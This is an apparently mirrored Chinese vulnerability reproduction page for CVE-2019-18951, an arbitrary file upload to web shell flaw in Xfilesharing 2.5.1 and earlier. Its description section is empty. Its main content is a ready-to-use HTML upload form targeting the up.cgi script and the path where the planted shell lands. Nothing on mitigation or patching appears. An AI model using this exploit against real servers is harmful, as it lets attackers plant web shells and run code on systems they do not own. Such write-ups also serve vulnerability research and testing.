menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2019-18951)Xfilesharing 2.5.1本地文件上传getshell chevron_right (CVE-2019-18951)Xfilesharing 2.5.1本地文件上传getshell.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-18951)Xfilesharing 2.5.1本地文件上传getshell.md
    570 B / 2021-07-15 20:11:09
        (CVE-2019-18951)Xfilesharing 2.5.1本地文件上传getshell
========================================================

一、漏洞简介
------------

二、漏洞影响
------------

Version: \<=2.5.1

三、复现过程
------------

### 任意文件上传

    <form action="http://0-sec.org/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
        <input type="text" name="sid" value="joe">
        <input type="file" name="file">
        <input type="submit" value="Upload" name="submit">
    </form>

Shell : http://0-sec.org/cgi-bin/temp/joe/she
    links
    file_download